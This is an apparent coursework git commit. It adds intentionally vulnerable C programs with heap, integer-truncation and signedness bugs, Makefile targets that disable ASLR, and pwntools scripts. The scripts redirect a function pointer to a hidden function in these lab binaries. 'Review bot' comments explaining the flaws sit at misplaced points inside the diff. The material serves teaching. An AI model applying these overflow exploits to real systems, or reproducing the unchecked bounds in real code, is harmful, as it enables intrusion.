commit 66b90de8fe437f3ed7f2b583daf25b07a24fc1ff
Author: Ludwig Lehnert
Date: Thu May 22 10:44:24 2025 +0200
initial commit
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..1aed4ff
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,2 @@
+venv/
+.ropeproject/
diff --git a/ex03/heap_overflows/Makefile b/ex03/heap_overflows/Makefile
new file mode 100755
index 0000000..284b843
--- /dev/null
+++ b/ex03/heap_overflows/Makefile
@@ -0,0 +1,24 @@
+CC=gcc
+CFLAGS= -std=gnu99 -D_GNU_SOURCE
+#CFLAGS= -pie -fPIE -std=gnu99 -D_GNU_SOURCE
+OBJ = heap.o
+RM = rm -rf
+TARGETS = heap
+ASLR_ON=/usr/bin/sudo /sbin/sysctl -w kernel.randomize_va_space=2
+ASLR_OFF=/usr/bin/sudo /sbin/sysctl -w kernel.randomize_va_space=0
+
+all: $(TARGETS)
+
+.c.o:
+ $(CC) $(CFLAGS) -c $<
+
+aslr_on:
+ $(ASLR_ON)
+
+aslr_off:
+ $(ASLR_OFF)
+
+clean:
+ $(RM) $(OBJ) $(TARGETS)
+
+.PHONY: all clean
diff --git a/ex03/heap_overflows/attack.py b/ex03/heap_overflows/attack.py
new file mode 100644
index 0000000..fc1c66d
--- /dev/null
+++ b/ex03/heap_overflows/attack.py
@@ -0,0 +1,10 @@
+from pwn import *
+import subprocess
+
+context(arch='amd64', os='linux', log_level='info')
+
+secret_addr = ELF('./heap').symbols['s3cr3t']
+secret_addr = secret_addr - 0x1000 + 0x555555555000
+arg = b'}' * 24 + p64(secret_addr).rstrip(b'\x00')
+
+subprocess.run(['./heap', arg])
diff --git a/ex03/heap_overflows/heap.c b/ex03/heap_overflows/heap.c
new file mode 100755
index 0000000..03fc1ff
--- /dev/null
+++ b/ex03/heap_overflows/heap.c
@@ -0,0 +1,93 @@
+#include
+#include
+#include
+#include
+#include
+#include
+
+typedef struct creds creds_t;
+
+typedef struct creds {
+ char name[16];
+ bool root;
+ void (*welcome)(void);
+} creds_t;
+
+static creds_t *creds;
+
+/* internal prototypes */
+static void login(void);
+
+static void s3cr3t(void);
+
+/* entry point */
+int main(int argc, char **argv) {
+ if (argc < 2) {
+ printf("usage: %s \n", argv[0]);
+ return -1;
+ }
+
+ creds = (creds_t *)calloc(1, sizeof(creds_t));
+ if (!creds) {
+ perror("calloc");
+ return -1;
+ }
+
+ // Super duper cooler patch
+ if (strlen(argv[1]) >= 16) {
+ printf("\"%s\" is way too long, I'll give you a KISS\n", argv[1]);
+ return -1;
+ }
+
+ // XXX
+#if 0
+ printf("creds = %#lx\n", (uint64_t) creds);
+ printf("creds->name = %#lx\n", (uint64_t) &creds->name);
+ printf("creds->root = %#lx\n", (uint64_t) &creds->root);
+ printf("creds->welcome = %#lx\n", (uint64_t) &creds->welcome);
+ printf("login = %#lx\n", (uint64_t) login);
+ printf("s3cr3t = %#lx\n", (uint64_t) s3cr3t);
+#endif
+ // XXX
+
+ creds->welcome = login;
+ creds->root = false;
+ strcpy(creds->name, argv[1]); // Schwachstelle diese hier
+ creds->welcome();
+ free(creds);
+ return 0;
+}
+
+/* internal function definitions */
+static void login(void) {
+ printf("Hello %s, you have %s root privileges.\n", creds->name,
+ ((creds->root) ? 
"gained" : "no")); +} + +static void s3cr3t(void) { printf("You've gathered secret material!\n"); } + +// aslr_off: Addressraum nicht mehr randomisiert +// +// root: ./heap oarsch_7777777777 +// +// absturz: ./heap oarsch_77777777778888888 +// +// s3cr3t: ./heap oarsch_77777777778888888 +// +// ./heap oarsch_77777777778888888mSUUUU (0x55555555536d = mSUUUU) +// +// bei #if 0 funzt der Angriffsvektor natuerlich nimmer, weil code von s3cr3t verschoben +// (Instruktionen fehlen ja jetzat) +// +// from pwn import * +// import subprocess +// +// context(arch='amd64', os='linux', log_level='info') +// +// secret_addr = ELF('./heap').symbols['s3cr3t'] +// secret_addr = secret_addr - 0x1000 + 0x555555555000 +// arg = b'}' * 24 + p64(secret_addr).rstrip(b'\x00') +// +// subprocess.run(['./heap', arg]) +// +// diff --git a/ex03/int_overflows/Makefile b/ex03/int_overflows/Makefile new file mode 100755 index 0000000..309c5d5 --- /dev/null +++ b/ex03/int_overflows/Makefile @@ -0,0 +1,15 @@ +CC=gcc +CFLAGS= -std=gnu99 -D_GNU_SOURCE +OBJ = int01.o int03.o +RM = rm -rf +TARGETS = int01 int03 + +all: $(TARGETS) + +.c.o: + $(CC) $(CFLAGS) -c $< + +clean: + $(RM) $(OBJ) $(TARGETS) + +.PHONY: all clean diff --git a/ex03/int_overflows/int01.c b/ex03/int_overflows/int01.c new file mode 100755 index 0000000..7c50083 --- /dev/null +++ b/ex03/int_overflows/int01.c 
@@ -0,0 +1,115 @@
+/* includes */
+#include
+#include
+#include
+#include
+
+/* internal prototypes */
+static void a(void);
+
+static void b(const char *str);
+
+static void c(void);
+
+int main(int argc, char **argv) {
+ a();
+ if (argc > 1) {
+ b(argv[1]);
+ } else {
+ printf("\nAufgabe b)\nTODO: Uebergeben Sie eine Zahl auf der Kommandozeile "
+ "um Funktion b() auszufuehren.\n");
+ }
+ c();
+ return 0;
+}
+
+/* internal function definitions */
+static void a(void) {
+ /* displays the size and ranges of the fixed size integer types */
+ printf("\nAufgabe a)\n");
+
+ int8_t i8_min = 0x80;
+ int8_t i8_max = 0x7f;
+
+ uint8_t u8_min = 0;
+ uint8_t u8_max = 0xff;
+
+ int16_t i16_min = 0x8000;
+ int16_t i16_max = 0x7fff;
+
+ uint16_t u16_min = 0;
+ uint16_t u16_max = 0xffff;
+
+ int32_t i32_min = 0x80000000;
+ int32_t i32_max = 0x7fffffff;
+
+ uint32_t u32_min = 0;
+ uint32_t u32_max = 0xffffffff;
+
+ int64_t i64_min = 0x8000000000000000;
+ int64_t i64_max = 0x7fffffffffffffff;
+
+ uint64_t u64_min = 0;
+ uint64_t u64_max = 0xffffffffffffffff;
+
+ printf("i8_min: %hhd, i8_max: %hhd\n", i8_min, i8_max);
+ printf("u8_min: %hhu, u8_max: %hhu\n", u8_min, u8_max);
+ printf("i16_min: %hd, i16_max: %hd\n", i16_min, i16_max);
+ printf("u16_min: %hu, u16_max: %hu\n", u16_min, u16_max);
+ printf("i32_min: %d, i32_max: %d\n", i32_min, i32_max);
+ printf("u32_min: %u, u32_max: %u\n", u32_min, u32_max);
+ printf("i64_min: %ld, i64_max: %ld\n", i64_min, i64_max);
+ printf("u64_min: %lu, u64_max: %lu\n", u64_min, u64_max);
+}
+
+// gib einfach 2147483648
+static void b(const char *str) {
+ /* No compiler warnings anymore */
+ printf("\nAufgabe b)\n");
+ char *endptr;
+ errno = 0;
+ int32_t s32 = (int32_t)strtol(str, &endptr, 10);
+ if (errno || *endptr) {
+ fprintf(stderr, "Conversion error, non-convertible part: %s\n", endptr);
+ } else {
+ printf("s32 = %d\n", s32);
+ }
+}
+
+static void c(void) {
+ /* gcc generates compiler warnings (-Woverflow) */
+ printf("\nAufgabe c)\n");
+
+ const int8_t target = 42;
+
+ uint8_t u8 = 122;
+ int8_t s8 = 100;
+ uint16_t u16 = 1567;
+ int16_t s16 = 3000;
+ uint32_t u32 = 5049039;
+ int32_t s32 = 93049309;
+ uint64_t u64 = 90394039403;
+ int64_t s64 = 59848904909;
+
+ uint8_t u8_comp = target + 255 - u8 + 1;
+ uint16_t u16_comp = target + 65535 - u16 + 1;
+ uint32_t u32_comp = target + 4294967295 - u32 + 1;
+ uint64_t u64_comp = target + 18446744073709551615 - u64 + 1;
+
+ int8_t s8_comp = target + 255 - ((uint8_t) s8) + 1;
+ int16_t s16_comp = target + 65535 - ((uint16_t) s16) + 1;
+ int32_t s32_comp = target + 4294967295 - ((uint32_t) s32) + 1;
+ int64_t s64_comp = target + 18446744073709551615 - ((uint64_t) s64) + 1;
+
+ printf("u8: %hhu\n", u8 + u8_comp);
+ printf("u16: %hu\n", u16 + u16_comp);
+ printf("u32: %u\n", u32 + u32_comp);
+ printf("u64: %lu\n", u64 + u64_comp);
+
+ printf("s8: %hhd\n", s8 + s8_comp);
+ printf("s16: %hd\n", s16 + s16_comp);
+ printf("s32: %d\n", s32 + s32_comp);
+ printf("s64: %ld\n", s64 + s64_comp);
+}
+
+// int02: s8, s16, u32
diff --git a/ex03/int_overflows/int03.c b/ex03/int_overflows/int03.c
new file mode 100755
index 0000000..0936d0e
--- /dev/null
+++ b/ex03/int_overflows/int03.c
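Review bot: In `b()`, `int32_t s32 = (int32_t)strtol(str, &endptr, 10);` narrows a 64-bit `long` with no range check, so on LP64 a value such as the 2147483648 named in the comment above passes the `errno`/`*endptr` test and wraps silently — the cast removed the compiler warning the `/* No compiler warnings anymore */` comment refers to, not the overflow. Keep the `long` and validate it before narrowing: `long v = strtol(str, &endptr, 10);` then `if (errno || *endptr || v < INT32_MIN || v > INT32_MAX) {` and assign `s32 = (int32_t)v` only in the success branch. In `a()`, initialisers like `int8_t i8_min = 0x80;` rely on implementation-defined narrowing; `INT8_MIN`/`INT8_MAX` and friends from `<stdint.h>` say the same thing portably, and the `%ld`/`%lu` specifiers on the 64-bit values should be `PRId64`/`PRIu64` from `<inttypes.h>`. `c()` appears to provoke `-Woverflow` on purpose, so its constants are left as the exercise intends.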
@@ -0,0 +1,74 @@
+/* includes */
+#include
+#include
+#include
+#include
+#include
+
+/* internal protoypes */
+static void print(void);
+
+static void insert(const char *name, uint32_t index);
+
+typedef struct cred {
+ char name[16];
+} cred_t;
+
+static cred_t creds[8];
+
+#define ADMIN "root"
+
+// ./int03 huan 4294967296
+
+/* entry point */
+int main(int argc, char **argv) {
+ if (argc < 3) {
+ printf("usage: %s \n", argv[0]);
+ return -1;
+ }
+ char *endptr;
+ errno = 0;
+ uint32_t index = (uint32_t)strtoull(argv[2], &endptr, 10);
+ if (errno || *endptr) {
+ fprintf(stderr, "Conversion error, non-convertible part: %s\n", endptr);
+ exit(EXIT_FAILURE);
+ }
+
+ snprintf(creds[0].name, 16, "%s", ADMIN);
+ if (index == 0) {
+ fprintf(stderr, "ALERT: someone tried to overwrite admin account!\n");
+ exit(EXIT_FAILURE);
+ }
+
+ insert(argv[1], index);
+ print();
+ return 0;
+}
+
+/* internal function definitions */
+static void insert(const char *name, uint32_t index) {
+ if (index > 7) {
+ fprintf(stderr, "Invalid index\n");
+ exit(EXIT_FAILURE);
+ }
+ if (strlen(name) > 15) {
+ fprintf(stderr, "Name must not exceed 15 characters\n");
+ exit(EXIT_FAILURE);
+ }
+ snprintf(creds[index].name, 16, "%s", name);
+}
+
+static void print(void) {
+ for (int i = 0; i < 8; ++i) {
+ if (i == 0) {
+ printf("Admin: ");
+ } else {
+ printf("User: ");
+ }
+ if (strcmp(creds[i].name, "")) {
+ printf("%s\n", creds[i].name);
+ } else {
+ printf("unknown\n");
+ }
+ }
+}
diff --git a/ex03/mixed/Makefile b/ex03/mixed/Makefile
new file mode 100755
index 0000000..34d97b0
--- /dev/null
+++ b/ex03/mixed/Makefile
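Review bot: `uint32_t index = (uint32_t)strtoull(argv[2], &endptr, 10);` truncates the parsed value before any range check, so every input of the form k·2^32 + i aliases onto slot i (the `// ./int03 huan 4294967296` comment shows the k=1, i=0 case, which only the later `index == 0` test happens to catch), and `strtoull` also accepts a leading `-` and wraps it instead of failing. Validate the full-width value and the sign first, then narrow: `unsigned long long v = strtoull(argv[2], &endptr, 10);` and `if (errno || *endptr || strchr(argv[2], '-') || v >= sizeof creds / sizeof creds[0]) {` before `index = (uint32_t)v;`. The literals `16`, `7`, `8` and `15` in `main`, `insert` and `print` should all be derived from `sizeof creds[0].name` and the array length so the bounds cannot drift from the declarations; `strcmp(creds[i].name, "")` is more directly written `creds[i].name[0] != '\0'`.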
@@ -0,0 +1,23 @@
+CC=gcc
+CFLAGS= -std=gnu99 -D_GNU_SOURCE
+OBJ = mixed01.o mixed02.o mixed03.o mixed04.o
+RM = rm -rf
+TARGETS = mixed01 mixed02 mixed03 mixed04
+ASLR_ON=/sbin/sysctl -w kernel.randomize_va_space=2
+ASLR_OFF=/sbin/sysctl -w kernel.randomize_va_space=0
+
+all: $(TARGETS)
+
+.c.o:
+ $(CC) $(CFLAGS) -c $<
+
+aslr_on:
+ $(ASLR_ON)
+
+aslr_off:
+ $(ASLR_OFF)
+
+clean:
+ $(RM) $(OBJ) $(TARGETS)
+
+.PHONY: all clean
diff --git a/ex03/mixed/mixed01.c b/ex03/mixed/mixed01.c
new file mode 100755
index 0000000..7b8c28a
--- /dev/null
+++ b/ex03/mixed/mixed01.c
@@ -0,0 +1,51 @@
+#include
+#include
+#include
+#include
+#include
+#include
+
+typedef struct creds creds_t;
+
+typedef struct creds {
+ char name[16];
+ void (*welcome)(void);
+} creds_t;
+
+static creds_t *creds;
+
+/* internal prototypes */
+static void login(void);
+
+static void s3cr3t(void);
+
+/* entry point */
+// ./mixed01 aaaaaaaaaaaaaaaaa 65536
+int main(int argc, char **argv) {
+ if (argc < 3) {
+ printf("usage: %s \n", argv[0]);
+ return -1;
+ }
+ int32_t size = atoi(argv[2]);
+ uint16_t s = size;
+ creds = (creds_t *)calloc(1, sizeof(creds_t));
+ if (!creds) {
+ perror("calloc");
+ return -1;
+ }
+ if (s >= sizeof(creds->name)) {
+ fprintf(stderr, "length exceeds buffer size\n");
+ free(creds);
+ return -1;
+ }
+ creds->welcome = login;
+ snprintf(creds->name, size + 1, "%s", argv[1]);
+ creds->welcome();
+ free(creds);
+ return 0;
+}
+
+/* internal function definitions */
+static void login(void) { printf("Hello %s.\n", creds->name); }
+
+static void s3cr3t(void) { printf("You've gathered secret material!\n"); }
diff --git a/ex03/mixed/mixed01.py b/ex03/mixed/mixed01.py
new file mode 100644
index 0000000..980691c
--- /dev/null
+++ b/ex03/mixed/mixed01.py
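Review bot: The bounds check in mixed01.c's `main` tests the truncated `uint16_t s`, while the `snprintf` two lines later uses the untruncated `int32_t size`, so any value whose low 16 bits are below 16 passes the check and `size + 1` becomes the write limit (the `// ./mixed01 aaaaaaaaaaaaaaaaa 65536` comment is one such value); a negative `size` passes too and converts to a huge `size_t`. Check the variable that is actually used, and parse with error reporting rather than `atoi`: `if (size < 0 || (size_t)size >= sizeof(creds->name)) {`, with `strtol` plus the `errno`/`*endptr` test the sibling files already use. The simplest correct form drops the caller-supplied length altogether: `snprintf(creds->name, sizeof(creds->name), "%s", argv[1]);`.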
@@ -0,0 +1,10 @@
+from pwn import *
+import subprocess
+
+context(arch='amd64', os='linux', log_level='info')
+
+secret_addr = ELF('./mixed01').symbols['s3cr3t']
+secret_addr = secret_addr - 0x1000 + 0x555555555000
+arg = b'}' * 16 + p64(secret_addr).rstrip(b'\x00')
+
+subprocess.run(['./mixed01', arg, '65536'])
diff --git a/ex03/mixed/mixed02.c b/ex03/mixed/mixed02.c
new file mode 100755
index 0000000..6850c03
--- /dev/null
+++ b/ex03/mixed/mixed02.c
@@ -0,0 +1,72 @@
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define BUF_SIZE 128
+
+typedef struct creds creds_t;
+
+typedef struct creds {
+ char str[BUF_SIZE];
+ void (*welcome)(void);
+} creds_t;
+static creds_t *creds;
+
+/* internal prototypes */
+static void cat(const char *s1, uint32_t len1, const char *s2, uint32_t len2);
+
+static void print(void);
+
+static void s3cr3t(void);
+
+/* entry point */
+// ./mixed02 dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd 4294967295 d 10
+int main(int argc, char **argv) {
+ if (argc < 5) {
+ printf("usage: %s \n", argv[0]);
+ return -1;
+ }
+
+ char *endptr;
+ errno = 0;
+ uint32_t len1 = (uint32_t)strtoul(argv[2], &endptr, 10);
+ if (errno || *endptr) {
+ fprintf(stderr, "Conversion error, non-convertible part: %s\n", endptr);
+ exit(EXIT_FAILURE);
+ }
+ errno = 0;
+ uint32_t len2 = (uint32_t)strtoul(argv[4], &endptr, 10);
+ if (errno || *endptr) {
+ fprintf(stderr, "Conversion error, non-convertible part: %s\n", endptr);
+ exit(EXIT_FAILURE);
+ }
+
+ creds = (creds_t *)calloc(1, sizeof(creds_t));
+ if (!creds) {
+ perror("calloc");
+ return -1;
+ }
+ creds->welcome = print;
+ cat(argv[1], len1, argv[3], len2);
+ creds->welcome();
+ free(creds);
+ return 0;
+}
+
+/* internal function definitions */
+static void cat(const char *s1, uint32_t len1, const char *s2, uint32_t len2) {
+ if ((len1 + len2) >= BUF_SIZE) {
+ fprintf(stderr, "Input strings exceed buffer size\n");
+ exit(EXIT_FAILURE);
+ }
+ snprintf(creds->str, len1 + 1, "%s", s1);
+ // TODO: creds->str+len1+1
+ snprintf(creds->str + len1, len2 + 1, "%s", s2);
+}
+
+static void print(void) { printf("%s!\n", creds->str); }
+
+static void s3cr3t(void) { printf("You've gathered secret material!\n"); }
diff --git a/ex03/mixed/mixed02.py b/ex03/mixed/mixed02.py
new file mode 100644
index 0000000..96ce1b7
--- /dev/null
+++ b/ex03/mixed/mixed02.py
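Review bot: In `cat`, `(len1 + len2) >= BUF_SIZE` is evaluated in `uint32_t` and wraps, so a pair of lengths whose true sum exceeds 2^32 passes the check even though each `snprintf` still uses its own `len1 + 1` / `len2 + 1` as the write limit (and `len2 + 1` itself wraps for `UINT32_MAX`). Test each operand without adding them: `if (len1 >= BUF_SIZE || len2 >= BUF_SIZE - len1) {`. The lengths are also taken on trust from argv rather than from the strings; `strnlen(s1, BUF_SIZE)` and `strnlen(s2, BUF_SIZE)` would tie them to the data, and the `// TODO: creds->str+len1+1` comment should be resolved either way — `creds->str + len1` is the correct offset (it overwrites the NUL written by the first call), so the comment reads as a leftover doubt rather than an open task.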
@@ -0,0 +1,12 @@
+from pwn import *
+import subprocess
+
+context(arch='amd64', os='linux', log_level='info')
+
+secret_addr = ELF('./mixed02').symbols['s3cr3t']
+secret_addr = secret_addr - 0x1000 + 0x555555555000
+
+arg0 = b'}' * 127
+arg1 = b'}' + p64(secret_addr).rstrip(b'\x00')
+
+subprocess.run(['./mixed02', arg0, '127', arg1, '4294967294'])
diff --git a/ex03/mixed/mixed03.c b/ex03/mixed/mixed03.c
new file mode 100755
index 0000000..84436f2
--- /dev/null
+++ b/ex03/mixed/mixed03.c
@@ -0,0 +1,64 @@
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define BUF_SIZE 128
+
+typedef struct creds creds_t;
+
+typedef struct creds {
+ char str[BUF_SIZE];
+ void (*welcome)(void);
+} creds_t;
+static creds_t *creds;
+
+/* internal prototypes */
+static void copy(const char *s, int32_t len1);
+
+static void print(void);
+
+static void s3cr3t(void);
+
+/* entry point */
+int main(int argc, char **argv) {
+ if (argc < 3) {
+ printf("usage: %s \n", argv[0]);
+ return -1;
+ }
+
+ char *endptr;
+ errno = 0;
+ int32_t len = (int32_t)strtol(argv[2], &endptr, 10);
+ if (errno || *endptr) {
+ fprintf(stderr, "Conversion error, non-convertible part: %s\n", endptr);
+ exit(EXIT_FAILURE);
+ }
+
+ creds = (creds_t *)calloc(1, sizeof(creds_t));
+ if (!creds) {
+ perror("calloc");
+ return -1;
+ }
+
+ creds->welcome = print;
+ copy(argv[1], len);
+ creds->welcome();
+ free(creds);
+ return 0;
+}
+
+/* internal function definitions */
+static void copy(const char *s, int32_t len) {
+ if (len >= BUF_SIZE) {
+ fprintf(stderr, "string length exceeds buffer size\n");
+ exit(EXIT_FAILURE);
+ }
+ snprintf(creds->str, len + 1, "%s", s);
+}
+
+static void print(void) { printf("%s\n", creds->str); }
+
+static void s3cr3t(void) { printf("You've gathered secret material!\n"); }
diff --git a/ex03/mixed/mixed03.py b/ex03/mixed/mixed03.py
new file mode 100644
index 0000000..b8dd5f2
--- /dev/null
+++ b/ex03/mixed/mixed03.py
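Review bot: In mixed03.c, `copy` takes a signed `int32_t len` but only rejects `len >= BUF_SIZE`, so a negative length passes the guard and `len + 1` converts to a very large `size_t` when it reaches `snprintf`, removing the bound entirely. Reject negatives in the same test, `if (len < 0 || len >= BUF_SIZE) {`, or change the parameter to an unsigned type and parse with `strtoul`; either way `main` should do its range check before the call rather than delegating it. The prototype names the parameter `len1` while the definition names it `len`; make the two agree, and the `(int32_t)strtol(...)` cast in `main` has the same unchecked narrowing as the other files in this commit.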
@@ -0,0 +1,12 @@
+from pwn import *
+import subprocess
+
+context(arch='amd64', os='linux', log_level='info')
+
+secret_addr = ELF('./mixed03').symbols['s3cr3t']
+secret_addr = secret_addr - 0x1000 + 0x555555555000
+
+arg = b'}' * 128 + p64(secret_addr).rstrip(b'\x00') + b'{'
+print(arg)
+
+subprocess.run(['./mixed03', arg, '-2'])
diff --git a/ex03/mixed/mixed04.c b/ex03/mixed/mixed04.c
new file mode 100755
index 0000000..12dba25
--- /dev/null
+++ b/ex03/mixed/mixed04.c
@@ -0,0 +1,81 @@
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define NUM_ELEMENTS 8
+
+typedef struct creds creds_t;
+
+typedef struct creds {
+ void (*welcome)(void);
+ uint64_t buffer[NUM_ELEMENTS];
+} creds_t;
+static creds_t *creds;
+
+/* internal prototypes */
+static void insert(uint64_t value, int64_t index);
+
+static void print(void);
+
+static void s3cr3t(void);
+
+/* entry point */
+int main(int argc, char **argv) {
+ if (argc < 3) {
+ printf("usage: %s \n", argv[0]);
+ return -1;
+ }
+
+ char *endptr;
+ errno = 0;
+ uint64_t value = (uint64_t)strtoull(argv[1], &endptr, 16);
+ if (errno || *endptr) {
+ fprintf(stderr, "Conversion error, non-convertible part: %s\n", endptr);
+ exit(EXIT_FAILURE);
+ }
+
+ errno = 0;
+ uint64_t index = (uint64_t)strtoull(argv[2], &endptr, 10);
+ if (errno || *endptr) {
+ fprintf(stderr, "Conversion error, non-convertible part: %s\n", endptr);
+ exit(EXIT_FAILURE);
+ }
+
+ if (index < 0) {
+ fprintf(stderr, "Negative index\n");
+ exit(EXIT_FAILURE);
+ }
+
+ creds = (creds_t *)calloc(1, sizeof(creds_t));
+ if (!creds) {
+ perror("calloc");
+ return -1;
+ }
+
+ creds->welcome = print;
+ insert(value, index);
+ creds->welcome();
+ free(creds);
+ return 0;
+}
+
+/* internal function definitions */
+static void insert(uint64_t value, int64_t index) {
+ if (index >= NUM_ELEMENTS) {
+ fprintf(stderr, "Invalid index!\n");
+ exit(EXIT_FAILURE);
+ }
+
+ creds->buffer[index] = value;
+}
+
+static void print(void) {
+ for (int i = 0; i < NUM_ELEMENTS; ++i) {
+ printf("Index %d: %#lx\n", i, creds->buffer[i]);
+ }
+}
+
+static void s3cr3t(void) { printf("You've gathered secret material!\n"); }
diff --git a/ex03/mixed/mixed04.py b/ex03/mixed/mixed04.py
new file mode 100644
index 0000000..e165072
--- /dev/null
+++ b/ex03/mixed/mixed04.py
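Review bot: `main` parses `index` as `uint64_t`, so `if (index < 0)` can never be true (gcc flags it under `-Wtype-limits`), and the value is then passed to `insert(uint64_t value, int64_t index)` where the implicit conversion turns anything at or above 2^63 negative; `index >= NUM_ELEMENTS` does not reject a negative index, so `creds->buffer[index] = value;` can write outside the array. Do the range check on the unsigned value before the call and keep the types consistent: replace the dead check with `if (index >= NUM_ELEMENTS) {` in `main`, and declare `insert` as `static void insert(uint64_t value, uint64_t index)` in both prototype and definition (or add `index < 0 ||` to its guard). `%#lx` for a `uint64_t` should be `PRIx64` from `<inttypes.h>` rather than assuming `unsigned long` is 64 bits.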
@@ -0,0 +1,9 @@
+from pwn import *
+import subprocess
+
+context(arch='amd64', os='linux', log_level='info')
+
+secret_addr = ELF('./mixed04').symbols['s3cr3t']
+secret_addr = secret_addr - 0x1000 + 0x555555555000
+
+subprocess.run(['./mixed04', hex(secret_addr), str(2 ** 64 - 1)])